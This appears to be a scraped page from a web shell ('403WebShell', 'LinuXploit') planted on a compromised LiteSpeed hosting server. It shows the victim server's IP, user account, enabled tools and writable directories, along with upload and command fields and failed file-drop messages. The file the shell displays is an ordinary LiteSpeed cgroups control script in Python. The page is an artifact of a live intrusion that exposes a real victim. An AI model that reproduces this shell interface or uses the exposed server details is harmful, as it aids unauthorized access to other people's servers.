Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.119.166.141
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/local/lsws/lsns/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/lsws/lsns/bin/lscgctl
#!/usr/bin/python3
import argparse, json, logging, os, pwd, subprocess, sys
import common
from stat import *
from subprocess import PIPE

def command_requires_uid(command):
    return command in ['list', 'list-user', 'reset', 'reset-user', 'set', 'set-user']

def validate_environment():
    if not os.path.exists('/sys/fs/cgroup/cgroup.controllers'):
        common.fatal_error("cgroups is not v2 on this machine")
    if os.getuid() != 0:
        common.fatal_error("this program must be run as root")
    common.ls_ok()
    if not os.path.isfile('/etc/systemd/system.control/user.slice.d/50-IOAccounting.conf'):
        logging.debug('Activate accounting')
        run_program(['systemctl', 'set-property', 'user.slice', 'IOAccounting=yes', 'MemoryAccounting=yes', 'TasksAccounting=yes'])
        systemctl_daemon_reload()
    
def init_pgm():
    common.init_logging()
    parser = argparse.ArgumentParser(prog="lscgctl",
                                     description='LiteSpeed cgroups Control Program')
    parser.add_argument("command", type=str, help="The cgroups command", 
                        choices=['list', 'list-all', 'list-user', 'reset', 'reset-all', 'reset-user', 'set', 'set-all', 'set-user', 'version'])
    parser.add_argument("uid", type=str, nargs='*', default=None, help="uid or user name for -user commands")
    parser.add_argument("--cpu", type=str, help="limit CPU access.  Specify a percentage of a complete core, 100 is 1 complete core.  Default is no limit (-1).")
    parser.add_argument("--io", type=str, help="limit I/O access.  Specify in bytes/sec.  Default is no limit (-1).")
    parser.add_argument("--iops", type=str, help="limit I/O access.  Specify in IOs per second.  Default is no limit (-1).")
    parser.add_argument('-l', '--log', type=int, help='set logging level, 10=Debug, 20=Info, 30=Warning, 40=Error.  Default is Info')
    parser.add_argument("--mem", type=str, help="limit virtual memory access.  Specify in bytes.  Default is no limit (-1).")
    parser.add_argument('-q', '--quiet', action='store_true', help='turns off all logging and only outputs what is requested.')
    parser.add_argument("--tasks", type=str, help="limit number of tasks.  Specify a maximum count of tasks that can be started.")
    args = parser.parse_args()
    if not args.quiet or args.log != None:
        if args.log != None:
            logging.getLogger().setLevel(args.log)
        else:
            logging.getLogger().setLevel(logging.INFO)
        logging.debug("Entering lscgctl")

    validate_environment()
    command = args.command
    if command_requires_uid(command):
        if args.uid == None:
            common.fatal_error("You must specify a user for the %s command" % command)
        users = common.get_users(args.uid)
    else:
        users = None
    if command == 'version':
        logging.info("Version: %s" % common.VERSION)
        if args.quiet:
            print(common.VERSION)
        sys.exit(0)
    if (command.startswith('set')) and (args.cpu == None and args.io == None and args.iops == None and args.mem == None and args.tasks == None):
        common.fatal_error("You specified command: %s and no qualifier to set with it" % command)
    return args, users

def read_stat(file, pos):
    try:
        f = open(file, 'r')
    except Exception as err:
        common.fatal_error('Error opening %s: %s' % (file, err))
    line = f.readline()
    pieces = line.split(' ')
    f.close()
    return pieces[pos]

def run_program(args, fail_reason = ""):
    logging.debug('run: ' + str(args))
    result = subprocess.run(args, stdout=PIPE, stderr=PIPE)
    if fail_reason != "" and result.returncode == 0:
        common.fatal_error('Expected: ' + args[0] + ' to fail: ' + fail_reason)
    if fail_reason == "" and result.returncode != 0:
        common.fatal_error('Error in running: ' + args[0] + ' errors: ' + result.stdout.decode('utf-8') + ' ' + result.stderr.decode('utf-8'))
    return result.stdout.decode('utf-8')

def user_to_file(user):
    return 'user-%s.slice' % user.pw_uid

def user_to_filename(user):
    return '/sys/fs/cgroup/user.slice/%s' % user_to_file(user)

def systemctl_show(user):
    return run_program(['systemctl', 'show', user_to_file(user)])

def systemctl_daemon_reload():
    logging.debug("Do daemon-reload")
    run_program(['systemctl', 'daemon-reload'])

def get_systemctl_item(result, item):
    start = result.find(item)
    if start == -1:
        logging.debug('%s not found in systemctl output' % item)
        return ""
    eol = result[start:].find('\n')
    if eol == -1:
        logging.debug('new line not found in search after finding %s' % item)
        eol = len(result[start:])
    equals = result[start:start+eol].find('=')
    if equals == -1 or equals > eol:
        logging.debug('equals not found in systemctl output search for %s: %s' % (item, result[start:start+eol]))
        return ""
    value = result[start+equals+1:start+eol]
    if value == 'infinity':
        return ''
    logging.debug('systemctl show for ' + item + ':' + value)
    return value
    
def get_systemctl_dev_num(result, item):
    val = get_systemctl_item(result, item)
    space = val.find(' ')
    if space == -1:
        return ''
    logging.debug('result %s: %s, val: %s' % (item, val, val[space+1:]))
    return common.str_num_values(val[space+1:])

def get_systemctl_num(result, item):
    val = get_systemctl_item(result, item)
    logging.debug('result %s: %s' % (item, val))
    return common.str_num_values(val)

def get_systemctl_cpu(result):
    val = get_systemctl_item(result, 'CPUQuotaPerSecUSec')
    if val == 'infinity' or val == 'max' or val == '':
        return ''
    ms = val.find('ms')
    logging.debug('cpu val:' + val + ' ms: %d' % ms)
    if ms > 0:
        percent = int(val[:ms]) / 10
        if percent == 0:
            return '0.%d' % int(val[:ms])
        return '%d' % percent
    s = val.find('s')
    if s > 0:
        return '%d' % int((float(val[:s]) * 100)) # A bug in systemd cgroups
    return '%f' % float(val) / 10000

def list_user(user, dict):
    systemctl_results = systemctl_show(user)
    subdict = {}
    subdict['name'] = user.pw_name
    subdict['cpu'] = get_systemctl_cpu(systemctl_results)
    subdict['io'] = get_systemctl_dev_num(systemctl_results, 'IOReadBandwidthMax')
    subdict['iops'] = get_systemctl_dev_num(systemctl_results, 'IOReadIOPSMax')
    subdict['mem'] = get_systemctl_num(systemctl_results, "MemoryMax")
    subdict['tasks'] = get_systemctl_num(systemctl_results, 'TasksMax')
    logging.debug("uid[" + str(user.pw_uid) + ']: ' + str(subdict))
    dict[user.pw_uid] = subdict
    
def command_list(users):
    dict = {}
    if users != None:
        for user in users:
            list_user(user, dict)
    else:
        users = pwd.getpwall()
        min_uid = common.get_min_uid()
        for listuser in users:
            if listuser.pw_uid >= min_uid and listuser.pw_name != 'nobody':
                list_user(listuser, dict)
    print(json.dumps(dict, indent=4))
    return 0

def set_properties(user, properties):
    pgm_parms = ['systemctl', 'set-property', user_to_file(user)]
    pgm_parms.extend(properties)
    return run_program(pgm_parms)

def set_device_parm(args, option, properties):
    devices = common.get_devices()[0]
    if option == common.OPTION_IO:
        title_read = 'IOReadBandwidthMax'
        title_write = 'IOWriteBandwidthMax'
        val = common.int_num_values(args.io)
    else:
        title_read = 'IOReadIOPSMax'
        title_write = 'IOWriteIOPSMax'
        val = common.int_num_values(args.iops)
    for device in devices:
        if val == -1:
            properties.append('%s=' % title_read)
            properties.append('%s=' % title_write)
            break
        else:
            properties.append('%s=%s %d' % (title_read, device, val))
            properties.append('%s=%s %d' % (title_write, device, val))
    return 0

def set_no_device_parm(args, option, properties):
    if option == common.OPTION_CPU:
        title = 'CPUQuota'
        val = common.int_num_values(args.cpu)
        format_set = '%s=%d%%'
    elif option == common.OPTION_MEM:
        title = 'MemoryMax'
        val = common.int_num_values(args.mem)
        format_set = '%s=%d'
    else:
        title = 'TasksMax'
        val = common.int_num_values(args.tasks)
        format_set = '%s=%d'
    if val == -1:
        properties.append('%s=' % title)
    else:
        properties.append(format_set % (title, val))
    if option == common.OPTION_MEM:
        properties.append('MemoryHigh=')

    
def reset_user(args, user, reload):
    args.cpu = '-1'
    args.io = '-1'
    args.iops = '-1';
    args.mem = '-1'
    args.tasks = '-1'
    return set_user(args, user, reload)

def command_reset(args, users):
    if args.command == 'reset' or args.command == 'reset-user':
        for user in users:
            reset_user(args, user, True)
    else:
        users = pwd.getpwall()
        min_uid = common.get_min_uid()
        need_reload = False
        for listuser in users:
            if listuser.pw_uid >= min_uid:
                need_reload = True
                reset_user(args, listuser)
        if need_reload:
            systemctl_daemon_reload()
    if not args.quiet:
        logging.info("Reset successful")
    return 0

def set_user(args, users, reload):
    properties = []
    if args.cpu != None:
        set_no_device_parm(args, common.OPTION_CPU, properties)
    if args.io != None:
        set_device_parm(args, common.OPTION_IO, properties)
    if args.iops != None:
        set_device_parm(args, common.OPTION_IOPS, properties)
    if args.mem != None:
        set_no_device_parm(args, common.OPTION_MEM, properties)
    if args.tasks != None:
        set_no_device_parm(args, common.OPTION_TASKS, properties)
    for user in users:
        set_properties(user, properties)
    if reload:
        systemctl_daemon_reload()
    if not args.quiet:
        return command_list(users)
    return 0

def command_set(args, users):
    if args.command == 'set' or args.command == 'set-user':
        set_user(args, users, True)
    else:
        users = pwd.getpwall()
        min_uid = common.get_min_uid()
        need_reload = False
        for listuser in users:
            if listuser.pw_uid >= min_uid:
                need_reload = True
                set_user(args, listuser, False)
        if need_reload:
            systemctl_daemon_reload()
    if not args.quiet:
        logging.info("Set successful")
    return 0

def do_pgm(args, users):
    logging.debug("Entering lscgctl, command: %s" % args.command)
    if 'reset' in args.command:
        ret = command_reset(args, users)
    elif 'list' in args.command:
        ret = command_list(users)
    elif 'set' in args.command:
        ret = command_set(args, users)
    else:
        common.fatal_error('Unexpected command: %s' % args.command)
    logging.debug("Exiting lscgctl")
    return ret

def main():
    args, users = init_pgm()
    return do_pgm(args, users)
  
if __name__ == "__main__":
    main()

Youez - 2016 - github.com/yon3zu
LinuXploit